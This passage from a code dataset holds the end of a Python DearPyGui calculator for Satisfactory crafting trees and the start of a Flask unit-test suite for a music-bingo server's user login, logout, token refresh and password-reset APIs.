level+1)\r\n self.aappend(i, tree.depend[ix], level+1)\r\n\r\ndef countplus():\r\n global Counter\r\n Counter +=1\r\n return Counter-1\r\n\r\ndef countzero():\r\n global Counter\r\n Counter = 0\r\n\r\ndef initCraft():\r\n global CRAFTS, sCRAFTS\r\n sCRAFTS = {}\r\n for i in CRAFTS:\r\n if i.IImp[0] != None:\r\n sCRAFTS[i.IExp] = i.ID\r\n\r\ndef DBget():\r\n global ITEMS, STRUCTURS, CRAFTS, sSTRUCTURS, sITEMS\r\n from openpyxl import load_workbook\r\n wb = load_workbook(filename='BD.xlsx')\r\n wsITEMS = wb[\"Items\"]\r\n wsSTRUCTURES = wb[\"Structures\"]\r\n wsCRAFTS = wb[\"Crafts\"]\r\n for row in tuple(wsITEMS.values):\r\n ITEMS.append(ITEM(ID=row[0], NAME=row[1]))\r\n for row in tuple(wsSTRUCTURES.values):\r\n STRUCTURS.append(STRUCTURE(ID=row[0], NAME=row[1]))\r\n for irow, row in enumerate(tuple(wsCRAFTS.values)):\r\n CRAFTS.append(CRAFT(irow, row))\r\n for i in ITEMS:\r\n sITEMS[i[1]] = i[0]\r\n for i in STRUCTURS:\r\n sSTRUCTURS[i[1]] = i[0]\r\n initCraft()\r\n\r\ndef clear_data(sender, app_data, user_data):\r\n global DownloadVar, ITEMS, STRUCTURS, CRAFTS, sITEMS, sSTRUCTURS, sLevel, TEMPID, sFather, NODES\r\n clear_pic = True\r\n import os\r\n try:\r\n os.remove(\"BD.xlsx\")\r\n except:\r\n pass\r\n try:\r\n if clear_pic:\r\n import shutil\r\n shutil.rmtree(\"pic\")\r\n shutil.rmtree(\"TEMP\")\r\n except:\r\n pass\r\n ITEMS, STRUCTURS, CRAFTS, sITEMS, sSTRUCTURS, sCRAFTS, sLevel, TEMPID, sFather, sLinks, NODES = [], [], [], {}, {}, {}, {}, [], {}, {}, []\r\n DownloadVar.set(0.0)\r\n\r\ndef update_data(sender, app_data, user_data):\r\n global DownloadVar, ITEMS, STRUCTURS, CRAFTS, sITEMS, sSTRUCTURS, ListComboboxVar\r\n dpg.bind_item_theme(\"Download\", \"theme_progressbar_blue\")\r\n dpg.configure_item(\"DB1\", enabled=False)\r\n dpg.configure_item(\"DB2\", enabled=False)\r\n clear_data(sender, app_data, user_data)\r\n import Fparser as BD\r\n BD.parser(boolpic=True, DownloadVar=DownloadVar)\r\n DBget()\r\n initCraft()\r\n ListComboboxVar.set(convertDictList(sITEMS))\r\n dpg.configure_item(\"DB1\", enabled=True)\r\n dpg.configure_item(\"DB2\", enabled=True)\r\n dpg.bind_item_theme(\"Download\", \"theme_progressbar_green\")\r\n\r\ndef START_CRAFT(sender, app_data, user_data):\r\n global TEMPID, sLevel, 
sFather, sLinks\r\n clear_node()\r\n TEMPID, sLevel, sFather, sLinks, NODES = [], {}, {}, {}, []\r\n countzero()\r\n def errorSTART():\r\n dpg.bind_item_theme(\"Calculate\", \"theme_button_red\")\r\n time.sleep(1)\r\n dpg.bind_item_theme(\"Calculate\", \"theme_button_gr\")\r\n\r\n item = ListComboboxVar.get()\r\n\r\n if item == \"Select item: \":\r\n errorSTART()\r\n return\r\n id_item = sITEMS[item]\r\n if sCRAFTS.get(id_item) != None:\r\n TREE = BinaryTree(item)\r\n def pre_order(node):\r\n global sLevel, sFather\r\n if node.father in sFather:\r\n sFather[node.father].append(node.id)\r\n elif node.father != None:\r\n sFather[node.father] = [node.id]\r\n if node.level in sLevel:\r\n sLevel[node.level] +=1\r\n else:\r\n sLevel[node.level] = 1\r\n node.x = (sLevel[node.level]-1)*300+30\r\n node.print()\r\n for i in node.depend:\r\n pre_order(i)\r\n pre_order(TREE.b_tree)\r\n pre_init_pic()\r\n def order(node):\r\n global sLevel, sFather\r\n create_node(node.id, node.x, node.y, node.item, node.structure, node.veight, node.veight_i)\r\n for i in node.depend:\r\n order(i)\r\n order(TREE.b_tree)\r\n create_links()\r\n else:\r\n errorSTART()\r\n return\r\n\r\ndef clear_node():\r\n for i in NODES:\r\n dpg.delete_item(i)\r\n\r\ndef create_links():\r\n for i in list(sFather.keys()):\r\n for jx, j in enumerate(sFather[i]) :\r\n dpg.add_node_link(sLinks[i][jx+1], sLinks[j][0], parent=\"node_editor\")\r\n\r\ndef create_node(id, x, y, item, structure, veight, veight_i):\r\n def _create(name, id, y, x):\r\n NODES.append(f\"node_{id}_{name}\")\r\n try:\r\n with dpg.add_node(label=f\"{name}\", parent=\"node_editor\", tag=f\"node_{id}_{name}\", pos=[x, y]):\r\n pass\r\n except:\r\n pass\r\n dpg.bind_item_font(f\"node_{id}_{name}\", font01)\r\n def _attrib(name, id, item, veight, veight_i, type_):\r\n if type_==1:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", tag=f\"node {id} out 0\"):\r\n with dpg.drawlist(width=100, height=100):\r\n dpg.draw_rectangle((0, 0), (100, 100), color=(100, 100, 100, 250), thickness=2)\r\n dpg.draw_image(f\"texture_{item}\", [0, 0], [100, 100])\r\n sLinks[id] = [f\"node {id} out 0\"]\r\n else:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", tag=f\"node {id} item-struct 2\"):\r\n dpg.bind_item_font(dpg.add_text(f\"output: {veight}\"), font0)\r\n if type_ == 1:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", attribute_type=dpg.mvNode_Attr_Output, tag=f\"node {id} item-struct 1\"):\r\n dpg.bind_item_font(dpg.add_text(veight),font0)\r\n else:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", attribute_type=dpg.mvNode_Attr_Static):\r\n with dpg.drawlist(width=100, height=100):\r\n dpg.draw_rectangle((0, 0), (100, 100), color=(100, 100, 100, 250), thickness=2)\r\n dpg.draw_image(f\"texture_{item}\", [0, 0], [100, 100])\r\n for ix, i in enumerate(veight_i):\r\n if i!=None:\r\n with dpg.node_attribute(parent=f\"node_{id}_{name}\", attribute_type=dpg.mvNode_Attr_Output, tag=f\"node {id} inp {ix}\"):\r\n dpg.bind_item_font(dpg.add_text(f\"input: {i}\"), font0)\r\n sLinks[id].append(f\"node {id} inp {ix}\")\r\n\r\n item_name = ITEMS[item - 1].NAME\r\n _create(item_name, id, x, y)\r\n _attrib(item_name, id, item, \" \",None,1)\r\n if structure!=None:\r\n struct_name = STRUCTURS[structure - STRUCTURS[0].ID].NAME\r\n _create(struct_name, id, x, y + 200)\r\n _attrib(struct_name, id, structure, veight, veight_i, 2)\r\n dpg.add_node_link(f\"node {id} item-struct 1\", f\"node {id} item-struct 2\", parent=\"node_editor\")\r\n\r\ndef pre_init_pic():\r\n from 
PIL import Image, ImageDraw\r\n from os import mkdir\r\n global initedPIC\r\n try:\r\n import shutil\r\n shutil.rmtree(\"TEMP\")\r\n except:\r\n pass\r\n try:\r\n mkdir(\"TEMP\")\r\n except:\r\n pass\r\n for i in initedPIC:\r\n dpg.delete_item(i)\r\n initedPIC = []\r\n for name in TEMPID:\r\n im1 = Image.new('RGBA', (256, 256), (0, 0, 0, 0))\r\n im2 = Image.open(f\"pic/{name}.png\").convert('RGBA').resize((210, 210))\r\n im1.paste(im2, (23, 23))\r\n draw = ImageDraw.Draw(im1)\r\n draw.ellipse((0, 0, 255, 255), outline=(255, 255, 255), width=7)\r\n im1.save(f\"TEMP/{name}.png\")\r\n width, height, channels, data = dpg.load_image(f\"TEMP/{name}.png\")\r\n with dpg.texture_registry(show=False):\r\n dpg.add_static_texture(width=width, height=height, default_value=data, tag=f\"texture_{name}\")\r\n initedPIC.append(f\"texture_{name}\")\r\n\r\ndef TEMPDEBUG(sender, app_data, user_data):\r\n print(ITEMS,STRUCTURS,CRAFTS,sITEMS,sSTRUCTURS,sCRAFTS,TEMPID,sLevel,sFather,sLinks,NODES,initedPIC, sep=\"\\n\")\r\n\r\ndef buttonhelp(sender, app_data, user_data):\r\n import webbrowser\r\n url = \"https://vk.com/degroidnayatvarina\"\r\n webbrowser.open(url, new=0, autoraise=True)\r\n\r\nconvertDictList = lambda s: [i[0] for i in s.items()]\r\n\r\nX,Y = 700, 652\r\nDownloadVar = floatvar(\"Download\")\r\nListComboboxVar = listvar(\"Combobox\")\r\nITEMS = []\r\nSTRUCTURS = []\r\nCRAFTS = []\r\nNODES = []\r\ninitedPIC = []\r\nTEMPID = []\r\nsSTRUCTURS = {}\r\nsITEMS = {}\r\nsCRAFTS = {}\r\nsLevel = {}\r\nsFather = {}\r\nsLinks = {}\r\nCounter = 0\r\n\r\ndpg.create_viewport(title=\"Calculator\", small_icon=\"main.ico\", large_icon=\"main.ico\")\r\ndpg.configure_viewport(0,x_pos=300, y_pos=200,width=X, height=Y, resizable=True)\r\n\r\nwith dpg.font_registry():\r\n font0 = dpg.add_font(file=\"My.otf\", size=12)\r\n font01 = dpg.add_font(file=\"My.otf\", size=14)\r\n font1 = dpg.add_font(file=\"My.otf\", size=20)\r\n font2 = dpg.add_font(file=\"My.otf\", size=40)\r\n font3 = dpg.add_font(file=\"My.otf\", size=50)\r\n font4 = dpg.add_font(file=\"My.otf\", size=60)\r\n\r\nwith dpg.theme(tag=\"theme_button_red\"):\r\n with dpg.theme_component(dpg.mvButton):\r\n dpg.add_theme_color(dpg.mvThemeCol_Button, (177, 86, 135, 255))\r\nwith dpg.theme(tag=\"theme_button_gr\"):\r\n with dpg.theme_component(dpg.mvButton):\r\n dpg.add_theme_color(dpg.mvThemeCol_Button, (51, 51, 55, 255))\r\n\r\nwith dpg.theme(tag=\"theme_progressbar_green\"):\r\n with dpg.theme_component(dpg.mvProgressBar):\r\n dpg.add_theme_color(dpg.mvThemeCol_PlotHistogram, (15, 135, 86, 255))\r\nwith dpg.theme(tag=\"theme_progressbar_blue\"):\r\n with dpg.theme_component(dpg.mvProgressBar):\r\n dpg.add_theme_color(dpg.mvThemeCol_PlotHistogram, (15, 86, 135, 255))\r\n\r\nwith dpg.window(no_resize=True, tag=\"Main_window\"):\r\n with dpg.group():\r\n with dpg.group(horizontal=True):\r\n dpg.add_loading_indicator(circle_count=12, style=0, radius=7, speed=0.3)\r\n dpg.bind_item_font(dpg.add_text(default_value=\"Satisfactory\\ncalculator\"), font3)\r\n dpg.add_button(label=\"Debug\", width=171, callback=TEMPDEBUG, show=False) #Button debug\r\n with dpg.group(horizontal=True, horizontal_spacing=5):\r\n dpg.bind_item_font(dpg.add_button(label=\"Creator\", width=171, callback=buttonhelp), font1)\r\n dpg.bind_item_font(dpg.add_combo((), width=387, default_value=\"Select item: \", tag=\"Combobox\"), font1)\r\n dpg.bind_item_font(dpg.add_button(label=\"Clear\", width=98, callback=clear_node), font1)\r\n dpg.add_separator()\r\n with dpg.group(horizontal=True, 
horizontal_spacing=5):\r\n with dpg.group():\r\n from os.path import isfile\r\n try:\r\n import shutil\r\n shutil.rmtree(\"TEMP\")\r\n except:\r\n pass\r\n if isfile(\"BD.xlsx\"):\r\n _ = 1.0\r\n DBget()\r\n ListComboboxVar.set(convertDictList(sITEMS))\r\n else:\r\n _ = 0.0\r\n dpg.add_progress_bar(tag=\"Download\", default_value=_, width=346, height=3)\r\n dpg.bind_item_theme(\"Download\", \"theme_progressbar_green\")\r\n with dpg.group(horizontal=True, horizontal_spacing=5):\r\n dpg.bind_item_font(dpg.add_button(tag=\"DB1\", label=\" Data Update \", width=171, height=49, callback=update_data), font1)\r\n dpg.bind_item_font(dpg.add_button(tag=\"DB2\", label=\" Clear Data \", width=170, height=49, callback=clear_data), font1)\r\n\r\n dpg.bind_item_font(dpg.add_button(label=\"Calculate\", tag=\"Calculate\", width=315, height=56, callback=START_CRAFT), font2)\r\n\r\n with dpg.node_editor(\r\n callback=lambda sender, app_data: dpg.add_node_link(app_data[0], app_data[1], parent=sender),\r\n delink_callback=lambda sender, app_data: dpg.delete_item(app_data), minimap=True,\r\n minimap_location=dpg.mvNodeMiniMap_Location_BottomRight, tag=\"node_editor\"):\r\n pass\r\ndpg.set_primary_window(window=\"Main_window\", value=True)\r\ndpg.setup_dearpygui()\r\ndpg.show_viewport()\r\ndpg.start_dearpygui()\r\ndpg.destroy_context()","repo_name":"BadRedCrab/SatisfactoryCalculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"28821293236","text":"\"\"\"\nTest user management server APIs\n\"\"\"\n\nimport copy\nimport ctypes\nfrom datetime import datetime, timedelta\nfrom functools import wraps\nimport json\nimport logging\nfrom pathlib import Path\nimport multiprocessing\nimport re\nimport shutil\nimport tempfile\nfrom typing import List, Optional, Set, cast\nimport unittest\nfrom unittest import mock\n\nfrom flask_testing import TestCase # type: ignore\nfrom freezegun import freeze_time # type: ignore\nimport requests\nfrom sqlalchemy import create_engine # type: ignore\nimport tinycss2 # type: ignore\n\nfrom musicbingo import models\nfrom musicbingo.options import DatabaseOptions, Options\nfrom musicbingo.options.extra import ExtraOptions\nfrom musicbingo.json_object import JsonObject\nfrom musicbingo.palette import Palette\nfrom musicbingo.progress import Progress\nfrom musicbingo.models.db import DatabaseConnection\nfrom musicbingo.models.group import Group\nfrom musicbingo.models.importer import Importer\nfrom musicbingo.models.user import User\nfrom musicbingo.server.app import create_app\nfrom musicbingo.server.api import SettingsApi\n\nfrom .config import AppConfig\nfrom .fixture import fixture_filename\nfrom .liveserver import LiveServerTestCase\nfrom .multipart_parser import MultipartMixedParser\nfrom .test_models import ModelsUnitTest\n\nDatabaseOptions.DEFAULT_FILENAME = None\nOptions.INI_FILENAME = None\n\nclass ServerBaseTestCase(TestCase):\n \"\"\" Base Tests \"\"\"\n\n def create_app(self):\n log_format = \"%(thread)d %(filename)s:%(lineno)d %(message)s\"\n logging.basicConfig(format=log_format)\n #logging.getLogger().setLevel(logging.DEBUG)\n #logging.getLogger(models.db.__name__).setLevel(logging.DEBUG)\n options = Options(database_provider='sqlite',\n database_name=':memory:',\n debug=False,\n smtp_server='unit.test',\n smtp_sender='sender@unit.test',\n smtp_reply_to='reply_to@unit.test',\n smtp_username='email',\n smtp_password='secret',\n 
smtp_starttls=False)\n fixtures = Path(__file__).parent / \"fixtures\"\n templates = Path(__file__).parent / \"..\" / \"server\" / \"templates\"\n return create_app('musicbingo.tests.config.AppConfig',\n options,\n static_folder=fixtures.resolve(),\n template_folder=templates.resolve())\n\n def setUp(self) -> None:\n # self.freezer = freeze_time(\"2020-01-02 03:04:05\")\n # self.freezer.start()\n DatabaseConnection.bind(self.options().database)\n\n def tearDown(self) -> None:\n DatabaseConnection.close()\n # self.freezer.stop()\n\n def options(self) -> Options:\n \"\"\"\n get the Options object associated with the Flask app\n \"\"\"\n return self.app.config['GAME_OPTIONS']\n\n @staticmethod\n def add_user(session, username, email, password, groups_mask=Group.USERS.value) -> User:\n \"\"\"\n Add a user to database\n \"\"\"\n user = User(\n username=username,\n password=User.hash_password(password),\n email=email,\n groups_mask=groups_mask,\n )\n session.add(user)\n session.flush()\n return user\n\n def login_user(self, username, password, rememberme=False):\n \"\"\"\n Call login REST API\n \"\"\"\n return self.client.post(\n '/api/user',\n data=json.dumps({\n 'username': username,\n 'password': password,\n 'rememberme': rememberme\n }),\n content_type='application/json',\n )\n\n def logout_user(self, access_token: str):\n \"\"\"\n Call logout REST API\n \"\"\"\n return self.client.delete(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n\n def register_user(self, username, email, password):\n \"\"\"\n Call register user REST API\n \"\"\"\n return self.client.put(\n '/api/user',\n data=json.dumps({\n 'username': username,\n 'password': password,\n 'email': email,\n }),\n content_type='application/json',\n )\n\n def refresh_access_token(self, refresh_token):\n \"\"\"\n Get a new access token using the refresh token\n \"\"\"\n return self.client.post(\n '/api/refresh',\n headers={\n \"Authorization\": f'Bearer {refresh_token}',\n }\n )\n\n # pylint: disable=invalid-name\n def assertNoCache(self, response):\n \"\"\"\n Assert that \"do not cache\" headers were set in response\n \"\"\"\n self.assertEqual(response.cache_control.max_age, 0)\n self.assertTrue(response.cache_control.no_cache)\n self.assertTrue(response.cache_control.no_store)\n self.assertTrue(response.cache_control.must_revalidate)\n\ndef freeze(time_str: str):\n \"\"\"\n Decorator for mocking datetime using freezegun\n \"\"\"\n def wrapper(func):\n @wraps(func)\n def decorated_function(*args, **kwargs):\n with freeze_time(time_str) as frozen_time:\n return func(*args, frozen_time, **kwargs)\n return decorated_function\n return wrapper\n\n\nclass TestUserApi(ServerBaseTestCase):\n \"\"\"\n Test user management server APIs\n \"\"\"\n\n render_templates = True\n\n @freeze(\"2020-01-02 03:04:05\")\n @models.db.db_session\n def test_log_in_using_username(self, frozen_time, dbs):\n \"\"\"Test log in of a registered user using username\"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n self.assertEqual(data['groups'], ['users'])\n self.assertIn('accessToken', data)\n self.assertIn('refreshToken', data)\n self.assertIn('options', data)\n options = self.options()\n self.assertEqual(data['options']['colourScheme'],\n options.colour_scheme.name.lower())\n 
self.assertEqual(data['options']['maxTickets'], options.max_tickets_per_user)\n self.assertEqual(data['options']['rows'], options.rows)\n self.assertEqual(data['options']['columns'], options.columns)\n access_token = data['accessToken']\n refresh_token = data['refreshToken']\n frozen_time.tick(delta=timedelta(seconds=(AppConfig.JWT_ACCESS_TOKEN_EXPIRES / 2)))\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertNoCache(response)\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n # check that a 401 response is returned once the access token has expired\n frozen_time.tick(delta=timedelta(seconds=(AppConfig.JWT_ACCESS_TOKEN_EXPIRES / 2)))\n frozen_time.tick(delta=timedelta(seconds=1))\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n with self.client:\n response = self.client.post(\n '/api/refresh',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n with self.client:\n response = self.refresh_access_token(refresh_token)\n self.assert200(response)\n self.assertNoCache(response)\n self.assertIn('accessToken', response.json)\n # pylint: disable=no-member\n access_token = response.json['accessToken']\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n options = self.options()\n expected = {\n 'pk': 1,\n 'username': 'user',\n 'email': 'user@unit.test',\n 'groups': ['users'],\n 'options': {\n 'colourScheme': options.colour_scheme.name.lower(),\n 'colourSchemes': [name.lower() for name in Palette.names()],\n 'columns': options.columns,\n 'maxTickets': options.max_tickets_per_user,\n 'rows': options.rows\n },\n 'last_login': '2020-01-02T03:04:05Z',\n 'reset_expires': None,\n 'reset_token': None\n }\n self.maxDiff = None # pylint: disable=attribute-defined-outside-init\n self.assertEqual(data, expected)\n\n @models.db.db_session\n def test_log_in_using_email(self, dbs):\n \"\"\"Test log in of a registered user using email\"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('user@unit.test', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = json.loads(response.data.decode())\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n self.assertEqual(data['groups'], ['users'])\n self.assertIn('accessToken', data)\n self.assertIn('refreshToken', data)\n self.assertIn('options', data)\n self.assertEqual(data['options']['colourScheme'],\n self.options().colour_scheme.name.lower())\n self.assertEqual(data['options']['maxTickets'], self.options().max_tickets_per_user)\n self.assertEqual(data['options']['rows'], self.options().rows)\n self.assertEqual(data['options']['columns'], self.options().columns)\n\n def test_log_in_wrong_password(self):\n \"\"\"Test log in of a registered user but wrong password\"\"\"\n with models.db.session_scope() as dbs:\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('user', 'wrong-password')\n self.assert401(response)\n 
self.assertNoCache(response)\n\n def test_log_in_unknown_user(self):\n \"\"\"\n Test attempt to log in with unknown user\n \"\"\"\n with models.db.session_scope() as dbs:\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.login_user('notregistered', 'mysecret')\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n\n def test_log_register_new_user(self):\n \"\"\"Test creation of a new user\"\"\"\n with self.client:\n response = self.register_user('newuser', 'user@unit.test', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = json.loads(response.data.decode())\n self.assertTrue(data['success'])\n user = data['user']\n self.assertEqual(user['username'], 'newuser')\n self.assertEqual(user['email'], 'user@unit.test')\n self.assertEqual(user['groups'], ['users'])\n self.assertIn('accessToken', data)\n self.assertIn('refreshToken', data)\n self.assertIn('options', user)\n self.assertEqual(user['options']['colourScheme'],\n self.options().colour_scheme.name.lower())\n self.assertEqual(user['options']['maxTickets'], self.options().max_tickets_per_user)\n self.assertEqual(user['options']['rows'], self.options().rows)\n self.assertEqual(user['options']['columns'], self.options().columns)\n\n def test_log_register_new_user_missing_field(self):\n \"\"\"Test creation of a new user where request missing data\"\"\"\n # email address is missing\n data = {\n 'username': 'newuser',\n 'password': 'secure',\n 'email': 'user@unit.test'\n }\n for field in ['username', 'password', 'email']:\n data2 = copy.copy(data)\n del data2[field]\n with self.client:\n response = self.client.put(\n '/api/user',\n data=json.dumps(data2),\n content_type='application/json',\n )\n self.assert400(response)\n self.assertNoCache(response)\n\n @freeze(\"2020-01-02 03:04:05\")\n @models.db.db_session\n def test_logout(self, frozen_time, dbs):\n \"\"\"\n Test log out of a registered user\n \"\"\"\n user = self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n user_pk = user.pk\n del user\n with self.client:\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n self.assertIn('accessToken', data)\n access_token = data['accessToken']\n refresh_token = data['refreshToken']\n self.assertEqual(user_pk, data['pk'])\n # check that only the refresh token has been added to the database\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 1)\n self.assertEqual(tokens[0].token_type, models.TokenType.REFRESH.value)\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n self.assertEqual(data['username'], 'user')\n self.assertEqual(data['email'], 'user@unit.test')\n with self.client:\n response = self.client.delete(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assert200(response)\n self.assertNoCache(response)\n with self.client:\n response = self.client.get(\n '/api/user',\n headers={\n \"Authorization\": f'Bearer {access_token}',\n }\n )\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 2)\n for token in tokens:\n 
self.assertTrue(token.revoked)\n # check that refresh token is no longer usable\n with self.client:\n response = self.refresh_access_token(refresh_token)\n self.assertEqual(response.status_code, 401)\n self.assertNoCache(response)\n models.Token.prune_database(dbs)\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 2)\n frozen_time.tick(delta=timedelta(seconds=(AppConfig.JWT_ACCESS_TOKEN_EXPIRES + 1)))\n models.Token.prune_database(dbs)\n # access token should have been removed from db\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 1)\n frozen_time.tick(delta=timedelta(days=1, seconds=2))\n models.Token.prune_database(dbs)\n # refresh token should have been removed from db\n tokens = dbs.query(models.Token).filter_by(user_pk=user_pk)\n self.assertEqual(tokens.count(), 0)\n\n @freeze(\"2020-01-02 03:04:05\")\n @mock.patch('musicbingo.server.api.smtplib.SMTP_SSL', autospec=True)\n def test_password_reset(self, frozen_time, mock_smtp):\n \"\"\"\n Test password reset of a registered user.\n It should send an email to the requested user that contains\n a reset link. The email will contain both a plain text and\n an HTML version.\n \"\"\"\n with models.db.session_scope() as dbs:\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], True, data)\n smtp_opts = self.options().smtp\n mock_smtp.assert_called_once_with(smtp_opts.server, smtp_opts.port, context=mock.ANY)\n context = mock_smtp.return_value.__enter__.return_value\n context.ehlo_or_helo_if_needed.assert_called()\n context.login.assert_called_once_with(smtp_opts.username, smtp_opts.password)\n context.send_message.assert_called_once_with(mock.ANY, smtp_opts.sender, 'user@unit.test')\n args, _ = context.send_message.call_args\n message = args[0]\n self.assertTrue(message.is_multipart())\n self.assertEqual(message.get(\"To\"), 'user@unit.test')\n self.assertEqual(message.get(\"From\"), smtp_opts.sender)\n plain = message.get_payload(0)\n html = message.get_payload(1)\n with self.assertRaises(IndexError):\n _ = message.get_payload(2)\n self.assertEqual(plain.get_content_type(), 'text/plain')\n self.assertEqual(html.get_content_type(), 'text/html')\n token_lifetime = self.app.config['PASSWORD_RESET_TOKEN_EXPIRES']\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n self.assertIsNotNone(user.reset_expires)\n self.assertIsNotNone(user.reset_token)\n self.assertEqual(user.reset_expires, datetime.now() + token_lifetime)\n reset_token = user.reset_token\n reset_url = f'http://localhost/user/reset/{reset_token}'\n self.assertIn(reset_url, str(plain))\n self.assertIn(smtp_opts.reply_to, str(plain))\n self.assertIn(reset_url, str(html))\n self.assertIn(smtp_opts.reply_to, str(html))\n frozen_time.tick(timedelta(seconds=(token_lifetime.total_seconds() - 10)))\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n 'token': reset_token,\n 'password': 'newpassword',\n 'confirmPassword': 'newpassword',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], True)\n 
with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n self.assertTrue(user.check_password('newpassword'))\n self.assertIsNone(user.reset_expires)\n self.assertIsNone(user.reset_token)\n\n\n @models.db.db_session\n def test_password_reset_missing_smtp_settings(self, dbs):\n \"\"\"\n Test password reset where SMTP settings have not been provided.\n It should detect the missing setting and include it in an\n error message to the client.\n \"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n orig_opts = self.options().smtp.to_dict()\n smtp_settings = ['server', 'port', 'sender', 'username', 'password']\n for option in smtp_settings:\n # restore SMTP settings before test\n for opt in smtp_settings:\n setattr(self.options().smtp, opt, orig_opts[opt])\n setattr(self.options().smtp, option, None)\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n msg = f'Should fail if {option} setting is missing'\n self.assertEqual(data['success'], False, msg)\n self.assertIn('Invalid SMTP settings', data['error'], msg)\n\n @models.db.db_session\n @mock.patch('musicbingo.server.api.smtplib.SMTP_SSL', autospec=True)\n def test_password_reset_unknown_email_address(self, dbs, mock_smtp):\n \"\"\"\n Test password reset using an unknown email address.\n It should return \"success: True\" to the client but not\n send an email.\n \"\"\"\n self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'unknown@unit.test',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], True)\n mock_smtp.assert_not_called()\n\n @freeze(\"2020-01-02 03:04:05\")\n def test_password_reset_link_expires(self, frozen_time):\n \"\"\"\n Test that password reset link stops working when token has expired\n \"\"\"\n with models.db.session_scope() as dbs:\n user = self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n user.reset_token = 'abc123'\n user.reset_expires = datetime.now() + timedelta(seconds=60)\n frozen_time.tick(delta=timedelta(seconds=61))\n with self.client:\n response = self.client.post(\n '/api/user/reset',\n data=json.dumps({\n 'email': 'user@unit.test',\n 'token': 'abc123',\n 'password': 'newpassword',\n 'confirmPassword': 'newpassword',\n }),\n content_type='application/json',\n )\n self.assert200(response)\n self.assertNoCache(response)\n data = response.json\n self.assertEqual(data['success'], False)\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n self.assertTrue(user.check_password('mysecret'))\n self.assertIsNotNone(user.reset_expires)\n self.assertIsNotNone(user.reset_token)\n\n def test_password_reset_link_cleared_after_login(self):\n \"\"\"\n Test that password reset token is removed after successful login\n \"\"\"\n with models.db.session_scope() as dbs:\n user = self.add_user(dbs, 'user', 'user@unit.test', 'mysecret')\n user.reset_token = 'abc123'\n user.reset_expires = datetime.now() + timedelta(seconds=60)\n response = self.login_user('user', 'mysecret')\n self.assert200(response)\n self.assertNoCache(response)\n with models.db.session_scope() as dbs:\n user = models.User.get(dbs, email='user@unit.test')\n 
